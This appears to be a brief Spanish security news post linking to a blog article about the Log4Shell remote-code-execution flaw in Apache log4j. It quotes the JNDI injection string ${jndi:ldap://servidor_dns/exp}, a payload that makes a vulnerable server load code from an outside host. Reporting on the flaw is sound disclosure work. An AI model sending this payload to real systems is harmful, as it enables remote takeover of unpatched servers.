#RCE en #Log4j (#log4shell): sencillo de explotar y presente en numerosas apps
Recientemente se ha publicado un exploit de día 0 en log4j, la popular librería de Java desarrollada por la Apache Foundation que da como resultado la ejecución remota de código (RCE) al loggear una determinada cadena con la sintaxis ${jndi:ldap://servidor_dns/exp}. Así de sencillo:
https://www.hackplayers.com/2021/12/ce-en-log4j-log4shell-simple-exploit.html
#Ñ #seguridad